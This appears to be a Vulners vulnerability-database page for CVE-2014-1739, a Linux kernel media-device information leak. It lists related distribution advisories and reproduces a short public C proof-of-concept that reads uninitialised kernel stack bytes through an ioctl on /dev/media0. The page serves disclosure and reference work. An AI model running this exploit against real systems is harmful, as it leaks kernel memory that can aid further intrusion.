Vulners
Lucene search
Linux Kernel 3.3.5 - driversmediamedia-device.c Local Information Disclosure
| Reporter | Title | Published | Views | Family All 146 |
|---|---|---|---|---|
 | Medium: kernel | 21 Aug 201400:00 | – | amazon |
 | Amazon Linux AMI : kernel (ALAS-2014-392) | 12 Oct 201400:00 | – | nessus |
| CentOS 7 : kernel (CESA-2014:1971) | 15 Dec 201400:00 | – | nessus |
| EulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1479) | 13 May 201900:00 | – | nessus |
| EulerOS Virtualization 3.0.1.0 : kernel (EulerOS-SA-2019-1485) | 13 May 201900:00 | – | nessus |
| EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1518) | 14 May 201900:00 | – | nessus |
| EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1519) | 14 May 201900:00 | – | nessus |
| openSUSE Security Update : the Linux Kernel (openSUSE-SU-2014:1677-1) | 22 Dec 201400:00 | – | nessus |
| Oracle Linux 7 : kernel (ELSA-2014-1971) | 10 Dec 201400:00 | – | nessus |
| Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2014-3096) | 5 Dec 201400:00 | – | nessus |
10
/*
source: https://www.securityfocus.com/bid/68048/info
The Linux kernel is prone to a local information-disclosure vulnerability.
Local attackers can exploit this issue to cause a memory leak to obtain sensitive information that may lead to further attacks.
Linux kernel 2.6.38 through 3.15-rc2 are vulnerable.
*/
/*
* $File: media-enum-poc.c
* $Description: CVE-2014-1739: Infoleak PoC in media_device_enum_entities() leaking 200 kstack bytes on x86_32.
* $Author: Salva Peiró <[email protected]> (c) Copyright 2014.
* $URL: http://speirofr.appspot.com/files/media-enum-poc.c
* $License: GPLv2.
*/
#include <stdio.h>
#include <fcntl.h>
#include <string.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <linux/media.h>
#define MEDIA_DEV "/dev/media0"
int main(int argc, char *argv[])
{
struct media_entity_desc u_ent = {};
char *file = MEDIA_DEV;
int i, fd, ret;
if (argc > 1)
file = argv[1];
fd = open(file, O_RDONLY);
if (fd < 0){
perror("open " MEDIA_DEV);
return -1;
}
u_ent.id = 0 | MEDIA_ENT_ID_FLAG_NEXT;
ret=ioctl(fd, MEDIA_IOC_ENUM_ENTITIES, &u_ent);
if (ret < 0){
perror("ioctl " MEDIA_DEV);
return -1;
}
printf("[*] CVE-2014-1739: Infoleak PoC in media_device_enum_entities() leaking %d kstack bytes:", sizeof(u_ent.reserved) + sizeof(u_ent.raw));
for (i = 0; i < 200/sizeof(uint32_t); i++) {
uint32_t data = *(uint32_t*)((uint32_t*)&u_ent.reserved+i);
if (i % 4 == 0)
printf("\n %08d: ", i);
printf("0x%08x ", data);
}
printf("\n");
return ret;
}
/*
gcc -Wall -g -m32 media-enum-poc.c -o media-enum-poc # */Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 May 2014 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.01121